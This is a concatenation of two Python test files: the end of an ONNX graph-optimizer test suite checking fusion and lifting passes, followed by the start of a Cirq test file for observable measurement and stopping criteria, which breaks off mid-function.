helper.make_node("Transpose", ["Y"], ["B"], perm=[1, 0]),
helper.make_node("Gemm", ["A", "B", "C"], ["Z"])]
nodes.extend(self._make_fake_loop_op(
[helper.make_node("Transpose", ["_X"], ["_A"], perm=[1, 0]),
helper.make_node("Transpose", ["_Y"], ["_B"], perm=[1, 0]),
helper.make_node("Gemm", ["_A", "_B", "_C"], ["_Z2"])],
[(TensorProto.FLOAT, (2, 3), "X"),
(TensorProto.FLOAT, (5, 2), "Y"),
(TensorProto.FLOAT, (3, 5), "C")],
[(TensorProto.FLOAT, (2, 3), "Z2")]))
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (2, 3)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (5, 2)),
helper.make_tensor_value_info("C", TensorProto.FLOAT, (3, 5))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (3, 5))])
optimized_model = self._optimized(graph, ["fuse_transpose_into_gemm"])
# Gemm, Constant (trip count), Constant (cond), Loop
assert len(list(optimized_model.graph.node)) == 4
assert optimized_model.graph.node[0].op_type == "Gemm"
# Gemm
assert len(optimized_model.graph.node[3].attribute[0].g.node) == 1
assert optimized_model.graph.node[3].attribute[0].g.node[0].op_type == "Gemm"
def test_fuse_add_bias_into_conv_use_weight_shape(self): # type: () -> None
nodes = [helper.make_node("Conv", ["X", "Y"], ["Z"]),
helper.make_node("Add", ["Z", "A"], ["B"])]
nodes.extend(self._make_fake_loop_op(
[helper.make_node("Conv", ["_X", "_Y"], ["_Z"]),
helper.make_node("Add", ["_Z", "_A"], ["_B2"])],
[(TensorProto.FLOAT, (1, 5, 3, 3), "X"),
(TensorProto.FLOAT, (16, 5, 3, 3), "Y"),
(TensorProto.FLOAT, (16, 1, 1), "A")],
[(TensorProto.FLOAT, (1, 16, 3, 3), "B2")]))
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 5, 3, 3)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (16, 5, 3, 3)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (16, 1, 1))],
[helper.make_tensor_value_info("B", TensorProto.FLOAT, (1, 16, 1, 1))],
)
optimized_model = self._optimized(graph, ["fuse_add_bias_into_conv"])
# Squeeze, Conv, Constant (trip count), Constant (condition), Loop
assert len(list(optimized_model.graph.node)) == 5
assert optimized_model.graph.node[0].op_type == 'Squeeze'
assert optimized_model.graph.node[1].op_type == 'Conv'
assert optimized_model.graph.output[0].name == 'Z'
# Squeeze, Conv
assert len(optimized_model.graph.node[4].attribute[0].g.node) == 2
assert optimized_model.graph.node[4].attribute[0].g.node[0].op_type == 'Squeeze'
assert optimized_model.graph.node[4].attribute[0].g.node[1].op_type == 'Conv'
# Output 1 since 0 is 'cond'
assert optimized_model.graph.node[4].attribute[0].g.output[1].name == '_Z'
def test_fuse_add_bias_into_conv_use_weight_shape_with_tile(self): # type: () -> None
conv = helper.make_node("Conv", ["X", "Y"], ["Z"])
add = helper.make_node("Add", ["Z", "A"], ["B"])
graph = helper.make_graph(
[conv, add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 5, 3, 3)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (16, 5, 3, 3)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (1,))],
[helper.make_tensor_value_info("B", TensorProto.FLOAT, (1, 16, 1, 1))],
)
optimized_model = self._optimized(graph, ["fuse_add_bias_into_conv"])
assert len(list(optimized_model.graph.node)) == 3
assert len(optimized_model.graph.value_info) == 1
assert optimized_model.graph.value_info[0].type.tensor_type.elem_type == TensorProto.INT64
assert len(optimized_model.graph.value_info[0].type.tensor_type.shape.dim) == 1
assert optimized_model.graph.node[0].op_type == 'Constant'
assert optimized_model.graph.node[1].op_type == 'Tile'
assert optimized_model.graph.node[2].op_type == 'Conv'
assert optimized_model.graph.output[0].name == 'Z'
def test_fuse_add_bias_into_conv_use_conv_shape(self): # type: () -> None
sub = helper.make_node("Sub", ["M", "N"], ["Y"])
conv = helper.make_node("Conv", ["X", "Y"], ["Z"])
add = helper.make_node("Add", ["Z", "A"], ["B"])
graph = helper.make_graph(
[sub, conv, add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 5, 3, 3)),
helper.make_tensor_value_info("M", TensorProto.FLOAT, (16, 5, 3, 3)),
helper.make_tensor_value_info("N", TensorProto.FLOAT, (16, 5, 3, 3)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (1, 16, 1, 1))],
[helper.make_tensor_value_info("B", TensorProto.FLOAT, (1, 16, 1, 1))],
value_info=[
helper.make_tensor_value_info("Z", TensorProto.FLOAT, (1, 16, 1, 1))
],
)
optimized_model = self._optimized(graph, ["fuse_add_bias_into_conv"])
assert len(optimized_model.graph.node) == 3
assert optimized_model.graph.node[0].op_type == 'Sub'
assert optimized_model.graph.node[1].op_type == 'Squeeze'
assert optimized_model.graph.node[2].op_type == 'Conv'
assert optimized_model.graph.output[0].name == 'Z'
assert optimized_model.graph.output[0].type.tensor_type.elem_type == TensorProto.FLOAT
assert len(optimized_model.graph.output[0].type.tensor_type.shape.dim) == 4
def test_fuse_add_bias_into_conv_use_move_constant(self): # type: () -> None
conv = helper.make_node("Conv", ["X", "Y"], ["Z"])
constant = helper.make_node("Constant", [], ["A"],
value=helper.make_tensor(
name="bias",
data_type=TensorProto.FLOAT,
dims=(16, 1, 1),
vals=np.random.randn(16).astype(np.float32).tolist()))
add = helper.make_node("Add", ["Z", "A"], ["B"])
graph = helper.make_graph(
[conv, constant, add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 5, 3, 3)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (16, 5, 3, 3))],
[helper.make_tensor_value_info("B", TensorProto.FLOAT, (1, 16, 1, 1))],
value_info=[
helper.make_tensor_value_info("A", TensorProto.FLOAT, (16, 1, 1)),
]
)
optimized_model = self._optimized(graph, ["fuse_add_bias_into_conv"])
assert len(optimized_model.graph.node) == 3
assert optimized_model.graph.node[0].op_type == 'Constant'
assert optimized_model.graph.node[1].op_type == 'Squeeze'
assert optimized_model.graph.node[2].op_type == 'Conv'
assert optimized_model.graph.output[0].name == 'Z'
assert optimized_model.graph.output[0].type.tensor_type.elem_type == TensorProto.FLOAT
assert len(optimized_model.graph.output[0].type.tensor_type.shape.dim) == 4
def test_fuse_add_bias_into_conv_squeeze_1d_bias_no_fuse(self): # type: () -> None
conv = helper.make_node("Conv", ["X", "Y"], ["Z"])
add = helper.make_node("Add", ["Z", "A"], ["B"])
graph = helper.make_graph(
[conv, add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 5, 3, 3)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (16, 5, 3, 3)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (3,))],
[helper.make_tensor_value_info("B", TensorProto.FLOAT, (1, 16, 1, 3))],
value_info=[
helper.make_tensor_value_info("Z", TensorProto.FLOAT, (1, 16, 1, 1)),
]
)
optimized_model = self._optimized(graph, ["fuse_add_bias_into_conv"])
assert len(list(optimized_model.graph.node)) == 2
assert optimized_model.graph.node[0].op_type == 'Conv'
assert optimized_model.graph.node[1].op_type == 'Add'
def test_fuse_add_bias_into_conv_squeeze_3d_bias_no_fuse(self): # type: () -> None
conv = helper.make_node("Conv", ["X", "Y"], ["Z"])
add = helper.make_node("Add", ["Z", "A"], ["B"])
graph = helper.make_graph(
[conv, add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 5, 3, 3)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (16, 5, 3, 3)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (16, 3, 3))],
[helper.make_tensor_value_info("B", TensorProto.FLOAT, (1, 16, 3, 3))],
value_info=[
helper.make_tensor_value_info("Z", TensorProto.FLOAT, (1, 16, 1, 1)),
]
)
optimized_model = self._optimized(graph, ["fuse_add_bias_into_conv"])
assert len(list(optimized_model.graph.node)) == 2
assert optimized_model.graph.node[0].op_type == 'Conv'
assert optimized_model.graph.node[1].op_type == 'Add'
def test_fuse_add_bias_into_conv_squeeze_4d_bias_no_fuse(self): # type: () -> None
conv = helper.make_node("Conv", ["X", "Y"], ["Z"])
add = helper.make_node("Add", ["Z", "A"], ["B"])
graph = helper.make_graph(
[conv, add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 5, 3, 3)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (16, 5, 3, 3)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (1, 16, 3, 3))],
[helper.make_tensor_value_info("B", TensorProto.FLOAT, (1, 16, 3, 3))]
)
optimized_model = self._optimized(graph, ["fuse_add_bias_into_conv"])
assert len(list(optimized_model.graph.node)) == 2
assert optimized_model.graph.node[0].op_type == 'Conv'
assert optimized_model.graph.node[1].op_type == 'Add'
def test_fuse_consecutive_squeezes(self): # type: () -> None
nodes = [helper.make_node("Squeeze", ["X"], ["Y"], axes=[0, 4, 5]),
helper.make_node("Squeeze", ["Y"], ["Z"], axes=[0, 3])]
nodes.extend(self._make_fake_loop_op(
[helper.make_node("Squeeze", ["_X"], ["_Y"], axes=[0, 4, 5]),
helper.make_node("Squeeze", ["_Y"], ["_Z2"], axes=[0, 3])],
[(TensorProto.FLOAT, (1, 1, 2, 3, 1, 1, 1, 1, 8, 9), "X")],
[(TensorProto.FLOAT, (2, 3, 1, 8, 9), "Z2")]))
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 1, 2, 3, 1, 1, 1, 1, 8, 9))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (2, 3, 1, 8, 9))])
optimized_model = self._optimized(graph, ["fuse_consecutive_squeezes"])
# Squeeze, Constant (trip count), Constant (cond), Loop
assert optimized_model.graph.node[0].op_type == "Squeeze"
assert list(optimized_model.graph.node[0].attribute[0].ints) == [0, 1, 4, 5, 6]
assert len(list(optimized_model.graph.node)) == 4
def test_fuse_consecutive_squeezes_default(self): # type: () -> None
squeeze1 = helper.make_node("Squeeze", ["X"], ["Y"], axes=[0, 4, 5])
squeeze2 = helper.make_node("Squeeze", ["Y"], ["Z"], axes=[0, 3])
squeeze3 = helper.make_node("Squeeze", ["Z"], ["A"], axes=[2])
nodes = [squeeze1, squeeze2, squeeze3]
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 1, 2, 3, 1, 1, 1, 1, 8, 9))],
[helper.make_tensor_value_info("A", TensorProto.FLOAT, (2, 3, 8, 9))])
optimized_model = self._optimized(graph, ["fuse_consecutive_squeezes"])
assert optimized_model.graph.node[0].op_type == "Squeeze"
assert list(optimized_model.graph.node[0].attribute[0].ints) == [0, 1, 4, 5, 6, 7]
assert len(list(optimized_model.graph.node)) == 1
def test_fuse_consecutive_squeezes_random(self): # type: () -> None
x_shape = [1, 1, 1, 3, 4, 1, 6, 1, 1, 9]
s1_one_indices = [i for i, a in enumerate(x_shape) if a == 1]
s1_axes = np.random.choice(s1_one_indices, size=np.random.randint(low=1, high=len(s1_one_indices) - 1),
replace=False)
s2_x_shape = [a for i, a in enumerate(x_shape) if i not in s1_axes]
s2_one_indices = [i for i, a in enumerate(s2_x_shape) if a == 1]
s2_axes = s2_one_indices
squeeze1 = helper.make_node("Squeeze", ["X"], ["Y"], axes=s1_axes)
squeeze2 = helper.make_node("Squeeze", ["Y"], ["Z"], axes=s2_axes)
nodes = [squeeze1, squeeze2]
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, x_shape)],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (3, 4, 6, 9))])
optimized_model = self._optimized(graph, ["fuse_consecutive_squeezes"])
assert optimized_model.graph.node[0].op_type == "Squeeze"
assert list(optimized_model.graph.node[0].attribute[0].ints) == [0, 1, 2, 5, 7, 8]
assert len(list(optimized_model.graph.node)) == 1
def test_fuse_consecutive_squeezes_multi_uses(self): # type: () -> None
squeeze1 = helper.make_node("Squeeze", ["X"], ["Y"], axes=[0, 4, 5])
add = helper.make_node("Add", ["Y", "A"], ["Z2"])
squeeze2 = helper.make_node("Squeeze", ["Y"], ["Z"], axes=[0, 3])
graph = helper.make_graph(
[squeeze1, add, squeeze2],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 1, 2, 3, 1, 1, 1, 1, 8, 9)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (1,))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (2, 3, 1, 8, 9)),
helper.make_tensor_value_info("Z2", TensorProto.FLOAT, (1, 2, 3, 1, 1, 8, 9))])
optimized_model = self._optimized(graph, ["fuse_consecutive_squeezes"])
assert optimized_model.graph.node[0].op_type == "Squeeze"
assert list(optimized_model.graph.node[0].attribute[0].ints) == [0, 4, 5]
assert optimized_model.graph.node[2].op_type == "Squeeze"
assert optimized_model.graph.node[2].input == ["X"]
assert list(optimized_model.graph.node[2].attribute[0].ints) == [0, 1, 4, 5, 6]
assert len(list(optimized_model.graph.node)) == 3
def test_preserve_value_info(self): # type: () -> None
trans1 = helper.make_node("Transpose", ["X"], ["Y"], perm=[1, 0, 2])
trans2 = helper.make_node("Transpose", ["Y"], ["Z"], perm=[2, 0, 1])
trans3 = helper.make_node("Transpose", ["Z"], ["A"], perm=[2, 0, 1])
graph = helper.make_graph(
[trans1, trans2, trans3],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (2, 3, 4))],
[helper.make_tensor_value_info("A", TensorProto.FLOAT, (2, 4, 3))])
vi = helper.make_tensor_value_info("Y", TensorProto.FLOAT, (3, 2, 4))
graph.value_info.extend([vi])
optimized_model = self._optimized(graph, ["nop"])
assert list(optimized_model.graph.value_info) == [vi]
assert len(list(optimized_model.graph.node)) == 3
def test_split(self): # type: () -> None
node = onnx.helper.make_node(
'Constant',
inputs=[],
outputs=['X'],
value=onnx.helper.make_tensor(
name='X',
data_type=TensorProto.FLOAT,
dims=[1],
vals=[5],
),
)
graph = helper.make_graph(
[node],
'test-optimize-split',
[],
[helper.make_tensor_value_info('X', TensorProto.FLOAT, (1,))])
init_model = self._optimized(graph, ['split_init'])
self.assertEqual(len(init_model.graph.node), 1)
self.assertEqual(len(init_model.graph.output), 1)
self.assertEqual(init_model.graph.node[0].op_type, 'Constant')
predict_model = self._optimized(graph, ['split_predict'])
self.assertEqual(len(predict_model.graph.node), 0)
self.assertEqual(len(predict_model.graph.input), 1)
self.assertEqual(predict_model.graph.input[0].name, 'X')
def test_lift_lex_loop(self): # type: () -> None
nodes = [helper.make_node("Identity", ["X"], ["Y"])]
nodes.extend(self._make_fake_loop_op(
[helper.make_node("Identity", ["X"], ["_Y2"]),
helper.make_node("Identity", ["Y"], ["_Y3"])],
[],
[(TensorProto.FLOAT, (5,), "Y2"),
(TensorProto.FLOAT, (5,), "Y3")]))
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (5,))],
[helper.make_tensor_value_info("Y", TensorProto.FLOAT, (5,)),
helper.make_tensor_value_info("Y2", TensorProto.FLOAT, (5,))])
optimized_model = self._optimized(graph, ["lift_lexical_references"])
assert len(optimized_model.graph.node) == 4
# body_graph, __control_inputs
assert len(optimized_model.graph.node[3].attribute) == 2
assert optimized_model.graph.node[3].attribute[1].name == "__control_inputs"
assert optimized_model.graph.node[3].attribute[1].strings[0] == b"X"
assert optimized_model.graph.node[3].attribute[1].strings[1] == b"Y"
def test_lift_lex_if(self): # type: () -> None
nodes = [helper.make_node("Identity", ["X"], ["Y"])]
nodes.extend(self._make_fake_if_op(
[helper.make_node("Identity", ["X"], ["_Y2"]),
helper.make_node("Identity", ["Y"], ["_Y3"])],
[helper.make_node("Identity", ["X"], ["_Y2"]),
helper.make_node("Identity", ["X"], ["_Y3"])],
[(TensorProto.FLOAT, (5,), "Y2"),
(TensorProto.FLOAT, (5,), "Y3")]))
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (5,))],
[helper.make_tensor_value_info("Y", TensorProto.FLOAT, (5,)),
helper.make_tensor_value_info("Y2", TensorProto.FLOAT, (5,))])
# "If" node now diverges from ONNX schema. Disable checking.
optimized_model = self._optimized(graph, ["lift_lexical_references"])
# Identity, Constant (condition), If
assert len(optimized_model.graph.node) == 3
# else_branch, then_branch, __control_inputs
assert len(optimized_model.graph.node[2].attribute) == 3
assert optimized_model.graph.node[2].attribute[2].name == "__control_inputs"
assert optimized_model.graph.node[2].attribute[2].strings[0] == b"X"
assert optimized_model.graph.node[2].attribute[2].strings[1] == b"Y"
def test_fuse_bn_into_conv_simple(self): # type: () -> None
for (tensor_type, np_type) in [(TensorProto.FLOAT, np.float32), (TensorProto.DOUBLE, np.float64)]:
conv = helper.make_node("Conv", ["X", "W", "B"], ["Y"])
bn = helper.make_node("BatchNormalization", ["Y", "scale", "b", "mean", "var"], ["Z"])
W = np.random.randn(3, 2, 5, 5).astype(np_type) + 2
B = np.random.randn(3,).astype(np_type) + 2
scale = np.random.randn(3,).astype(np_type) + 2
b = np.random.randn(3,).astype(np_type) + 2
mean = np.random.randn(3,).astype(np_type) + 2
var = np.abs(np.random.randn(3,).astype(np_type)) + 2
initializers = [
helper.make_tensor(name, tensor_type, npa.shape, npa.tobytes(), raw=True)
for name, npa in [('W', W), ('B', B), ('scale', scale), ('b', b), ('mean', mean), ('var', var)]
]
graph = helper.make_graph(
[conv, bn],
"test",
[helper.make_tensor_value_info("X", tensor_type, (5, 2, 28, 28)),
helper.make_tensor_value_info("W", tensor_type, (3, 2, 5, 5)),
helper.make_tensor_value_info("B", tensor_type, (3,)),
helper.make_tensor_value_info("scale", tensor_type, (3,)),
helper.make_tensor_value_info("b", tensor_type, (3,)),
helper.make_tensor_value_info("mean", tensor_type, (3,)),
helper.make_tensor_value_info("var", tensor_type, (3,))],
[helper.make_tensor_value_info("Z", tensor_type, (5, 3, 24, 24))],
initializer=initializers,
value_info=[
helper.make_tensor_value_info("Y", tensor_type, (5, 3, 24, 24))
]
)
optimized_model = self._optimized(graph, ["fuse_bn_into_conv"])
self.assertEqual(len(optimized_model.graph.node), 1)
self.assertEqual(optimized_model.graph.node[0].op_type, 'Conv')
self.assertEqual(len(optimized_model.graph.initializer), 2)
new_W = numpy_helper.to_array(optimized_model.graph.initializer[0])
new_b = numpy_helper.to_array(optimized_model.graph.initializer[1])
f = scale / np.sqrt(var + 1e-5)
np.testing.assert_almost_equal((B - mean) * f + b, new_b)
np.testing.assert_almost_equal(W * f[:, np.newaxis, np.newaxis, np.newaxis], new_W)
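# --- Illustrative standalone sketch (not one of the test cases) --------------
# A minimal example, using the same optimize-and-check flow as _optimized()
# above, of running a single named pass over a trivial Identity graph; it is
# defined here for reference only and is never invoked by the test suite.
def _example_eliminate_identity():  # pragma: no cover
    node = helper.make_node("Identity", ["X"], ["Y"])
    graph = helper.make_graph(
        [node],
        "example",
        [helper.make_tensor_value_info("X", TensorProto.FLOAT, (2,))],
        [helper.make_tensor_value_info("Y", TensorProto.FLOAT, (2,))])
    model = helper.make_model(graph, producer_name='onnx-example')
    optimized = onnx.optimizer.optimize(model, ["eliminate_identity"])
    checker.check_model(optimized)
    return optimized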
if __name__ == '__main__':
unittest.main()
|
|
# Copyright 2020 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tempfile
from typing import Iterable, Dict, List
import numpy as np
import pytest
import cirq
import cirq.work as cw
from cirq.work import _MeasurementSpec, BitstringAccumulator, group_settings_greedy, InitObsSetting
from cirq.work.observable_measurement import (
_with_parameterized_layers,
_get_params_for_setting,
_pad_setting,
_subdivide_meas_specs,
_aggregate_n_repetitions,
_check_meas_specs_still_todo,
StoppingCriteria,
_parse_checkpoint_options,
measure_observables_df,
CheckpointFileOptions,
VarianceStoppingCriteria,
measure_observables,
RepetitionsStoppingCriteria,
)
def test_with_parameterized_layers():
qs = cirq.LineQubit.range(3)
circuit = cirq.Circuit(
[
cirq.H.on_each(*qs),
cirq.CZ(qs[0], qs[1]),
cirq.CZ(qs[1], qs[2]),
]
)
circuit2 = _with_parameterized_layers(circuit, qubits=qs, needs_init_layer=False)
assert circuit != circuit2
assert len(circuit2) == 3 + 3 # 3 original, then X, Y, measure layer
*_, xlayer, ylayer, measurelayer = circuit2.moments
for op in xlayer.operations:
assert isinstance(op.gate, cirq.XPowGate)
assert op.gate.exponent.name.endswith('-Xf')
for op in ylayer.operations:
assert isinstance(op.gate, cirq.YPowGate)
assert op.gate.exponent.name.endswith('-Yf')
for op in measurelayer:
assert isinstance(op.gate, cirq.MeasurementGate)
circuit3 = _with_parameterized_layers(circuit, qubits=qs, needs_init_layer=True)
assert circuit != circuit3
assert circuit2 != circuit3
assert len(circuit3) == 2 + 3 + 3
xlayer, ylayer, *_ = circuit3.moments
for op in xlayer.operations:
assert isinstance(op.gate, cirq.XPowGate)
assert op.gate.exponent.name.endswith('-Xi')
for op in ylayer.operations:
assert isinstance(op.gate, cirq.YPowGate)
assert op.gate.exponent.name.endswith('-Yi')
def test_get_params_for_setting():
qubits = cirq.LineQubit.range(3)
a, b, c = qubits
init_state = cirq.KET_PLUS(a) * cirq.KET_ZERO(b)
observable = cirq.X(a) * cirq.Y(b)
setting = cw.InitObsSetting(init_state=init_state, observable=observable)
padded_setting = _pad_setting(setting, qubits=qubits)
assert padded_setting.init_state == cirq.KET_PLUS(a) * cirq.KET_ZERO(b) * cirq.KET_ZERO(c)
assert padded_setting.observable == cirq.X(a) * cirq.Y(b) * cirq.Z(c)
assert init_state == cirq.KET_PLUS(a) * cirq.KET_ZERO(b)
assert observable == cirq.X(a) * cirq.Y(b)
needs_init_layer = True
with pytest.raises(ValueError):
_get_params_for_setting(
padded_setting,
flips=[0, 0],
qubits=qubits,
needs_init_layer=needs_init_layer,
)
params = _get_params_for_setting(
padded_setting,
flips=[0, 0, 1],
qubits=qubits,
needs_init_layer=needs_init_layer,
)
assert all(
x in params
for x in [
'0-Xf',
'0-Yf',
'1-Xf',
'1-Yf',
'2-Xf',
'2-Yf',
'0-Xi',
'0-Yi',
'1-Xi',
'1-Yi',
'2-Xi',
'2-Yi',
]
)
circuit = cirq.Circuit(cirq.I.on_each(*qubits))
circuit = _with_parameterized_layers(
circuit,
qubits=qubits,
needs_init_layer=needs_init_layer,
)
circuit = circuit[:-1] # remove measurement so we can compute <Z>
psi = cirq.Simulator().simulate(circuit, param_resolver=params)
ma = cirq.Z(a).expectation_from_state_vector(psi.final_state_vector, qubit_map=psi.qubit_map)
mb = cirq.Z(b).expectation_from_state_vector(psi.final_state_vector, qubit_map=psi.qubit_map)
mc = cirq.Z(c).expectation_from_state_vector(psi.final_state_vector, qubit_map=psi.qubit_map)
np.testing.assert_allclose([ma, mb, mc], [1, 0, -1])
def test_params_and_settings():
qubits = cirq.LineQubit.range(1)
(q,) = qubits
tests = [
(cirq.KET_ZERO, cirq.Z, 1),
(cirq.KET_ONE, cirq.Z, -1),
(cirq.KET_PLUS, cirq.X, 1),
(cirq.KET_MINUS, cirq.X, -1),
(cirq.KET_IMAG, cirq.Y, 1),
(cirq.KET_MINUS_IMAG, cirq.Y, -1),
(cirq.KET_ZERO, cirq.Y, 0),
]
for init, obs, coef in tests:
setting = cw.InitObsSetting(
init_state=init(q),
observable=obs(q),
)
circuit = cirq.Circuit(cirq.I.on_each(*qubits))
circuit = _with_parameterized_layers(circuit, qubits=qubits, needs_init_layer=True)
params = _get_params_for_setting(
setting, flips=[False], qubits=qubits, needs_init_layer=True
)
circuit = circuit[:-1] # remove measurement so we can compute <Z>
psi = cirq.Simulator().simulate(circuit, param_resolver=params)
z = cirq.Z(q).expectation_from_state_vector(psi.final_state_vector, qubit_map=psi.qubit_map)
assert np.abs(coef - z) < 1e-2, f'{init} {obs} {coef}'
def test_subdivide_meas_specs():
qubits = cirq.LineQubit.range(2)
q0, q1 = qubits
setting = cw.InitObsSetting(
init_state=cirq.KET_ZERO(q0) * cirq.KET_ZERO(q1), observable=cirq.X(q0) * cirq.Y(q1)
)
meas_spec = cw._MeasurementSpec(
max_setting=setting,
circuit_params={
'beta': 0.123,
'gamma': 0.456,
},
)
flippy_mspecs, repetitions = _subdivide_meas_specs(
meas_specs=[meas_spec], repetitions=100_000, qubits=qubits, readout_symmetrization=True
)
fmspec1, fmspec2 = flippy_mspecs
assert repetitions == 50_000
assert fmspec1.meas_spec == meas_spec
assert fmspec2.meas_spec == meas_spec
assert np.all(fmspec2.flips)
assert not np.any(fmspec1.flips)
assert list(fmspec1.param_tuples()) == [
('0-Xf', 0),
('0-Yf', -0.5),
('0-Xi', 0),
('0-Yi', 0),
('1-Xf', 0.5),
('1-Yf', 0),
('1-Xi', 0),
('1-Yi', 0),
('beta', 0.123),
('gamma', 0.456),
]
def test_aggregate_n_repetitions():
with pytest.warns(UserWarning):
reps = _aggregate_n_repetitions({5, 6})
assert reps == 6
class _MockBitstringAccumulator(BitstringAccumulator):
def __init__(self):
super().__init__(
meas_spec=None,
simul_settings=None,
qubit_to_index={q: i for i, q in enumerate(cirq.LineQubit.range(5))},
)
def covariance(self, *, atol=1e-8) -> np.ndarray:
cov = np.cov(self.bitstrings.T, ddof=1)
assert cov.shape == (5, 5)
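        # Dividing the sample covariance by the number of samples turns it into
        # an estimate of the covariance of the sample means, which is the
        # quantity the variance-based stopping criteria reason about.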
return cov / len(self.bitstrings)
def test_variance_stopping_criteria():
stop = cw.VarianceStoppingCriteria(variance_bound=1e-6)
acc = _MockBitstringAccumulator()
assert stop.more_repetitions(acc) == 10_000
rs = np.random.RandomState(52)
# small number of results
acc.consume_results(rs.choice([0, 1], size=(100, 5)).astype(np.uint8))
assert stop.more_repetitions(acc) == 10_000
# large number of results
acc.consume_results(rs.choice([0, 1], size=(10_000, 5)).astype(np.uint8))
assert stop.more_repetitions(acc) == 0
class _WildVarianceStoppingCriteria(StoppingCriteria):
def __init__(self):
self._state = 0
def more_repetitions(self, accumulator: BitstringAccumulator) -> int:
"""Ignore everything, request either 5 or 6 repetitions."""
self._state += 1
return [5, 6][self._state % 2]
def test_variance_stopping_criteria_aggregate_n_repetitions():
stop = _WildVarianceStoppingCriteria()
acc1 = _MockBitstringAccumulator()
acc2 = _MockBitstringAccumulator()
accumulators = {'FakeMeasSpec1': acc1, 'FakeMeasSpec2': acc2}
with pytest.warns(UserWarning, match='the largest value will be used: 6.'):
still_todo, reps = _check_meas_specs_still_todo(
meas_specs=sorted(accumulators.keys()),
accumulators=accumulators,
stopping_criteria=stop,
)
assert still_todo == ['FakeMeasSpec1', 'FakeMeasSpec2']
assert reps == 6
def test_repetitions_stopping_criteria():
stop = cw.RepetitionsStoppingCriteria(total_repetitions=50_000)
acc = _MockBitstringAccumulator()
todos = [stop.more_repetitions(acc)]
for _ in range(6):
acc.consume_results(np.zeros((10_000, 5), dtype=np.uint8))
todos.append(stop.more_repetitions(acc))
assert todos == [10_000] * 5 + [0, 0]
def test_repetitions_stopping_criteria_partial():
stop = cw.RepetitionsStoppingCriteria(total_repetitions=5_000, repetitions_per_chunk=1_000_000)
acc = _MockBitstringAccumulator()
assert stop.more_repetitions(acc) == 5_000
def _set_up_meas_specs_for_testing():
q0, q1 = cirq.LineQubit.range(2)
setting = cw.InitObsSetting(
init_state=cirq.KET_ZERO(q0) * cirq.KET_ZERO(q1), observable=cirq.X(q0) * cirq.Y(q1)
)
meas_spec = _MeasurementSpec(
max_setting=setting,
circuit_params={
'beta': 0.123,
'gamma': 0.456,
},
)
bsa = cw.BitstringAccumulator(
meas_spec, [], {q: i for i, q in enumerate(cirq.LineQubit.range(3))}
)
return bsa, meas_spec
def test_meas_specs_still_todo():
bsa, meas_spec = _set_up_meas_specs_for_testing()
stop = cw.RepetitionsStoppingCriteria(1_000)
# 1. before taking any data
still_todo, reps = _check_meas_specs_still_todo(
meas_specs=[meas_spec],
accumulators={meas_spec: bsa},
stopping_criteria=stop,
)
assert still_todo == [meas_spec]
assert reps == 1_000
# 2. After taking a mocked-out 997 shots.
bsa.consume_results(np.zeros((997, 3), dtype=np.uint8))
still_todo, reps = _check_meas_specs_still_todo(
meas_specs=[meas_spec],
accumulators={meas_spec: bsa},
stopping_criteria=stop,
)
assert still_todo == [meas_spec]
assert reps == 3
# 3. After taking the final 3 shots
bsa.consume_results(np.zeros((reps, 3), dtype=np.uint8))
still_todo, reps = _check_meas_specs_still_todo(
meas_specs=[meas_spec],
accumulators={meas_spec: bsa},
stopping_criteria=stop,
)
assert still_todo == []
assert reps == 0
def test_meas_spec_still_todo_bad_spec():
bsa, meas_spec = _set_up_meas_specs_for_testing()
class BadStopping(StoppingCriteria):
def more_repetitions(self, accumulator: BitstringAccumulator) -> int:
return -23
bad_stop = BadStopping()
with pytest.raises(ValueError, match='positive'):
_, _ = _check_meas_specs_still_todo(
meas_specs=[meas_spec],
accumulators={meas_spec: bsa},
stopping_criteria=bad_stop,
)
def test_meas_spec_still_todo_too_many_params(monkeypatch):
monkeypatch.setattr(cw.observable_measurement, 'MAX_REPETITIONS_PER_JOB', 30_000)
bsa, meas_spec = _set_up_meas_specs_for_testing()
lots_of_meas_spec = [meas_spec] * 3_001
